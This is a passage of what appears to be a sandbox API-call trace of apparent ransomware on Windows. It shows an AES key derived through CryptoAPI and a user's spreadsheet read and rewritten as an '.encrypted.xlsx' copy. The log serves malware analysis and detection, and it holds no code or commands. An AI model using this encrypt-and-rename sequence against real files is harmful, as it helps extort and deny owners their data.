wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.810] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.810] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.810] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0031.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.811] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.812] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.817] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.817] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.817] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.817] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.818] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.818] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.818] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.818] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.818] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.818] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.818] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.819] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.819] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.819] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.819] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.819] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.819] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.819] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.820] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.820] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.820] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.820] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.820] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.820] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.820] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.820] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.820] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\t 5fxqshmby.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.821] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.821] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\t 5fxqshmby.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.824] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.825] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0031.827] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x7922, lpOverlapped=0x0) returned 1 [0031.827] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17922) returned 0x88ffb0 [0031.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0031.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17922) returned 0x8a78e0 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17922) returned 0x88ffb0 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.833] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17922) returned 0x88ffb0 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0031.833] 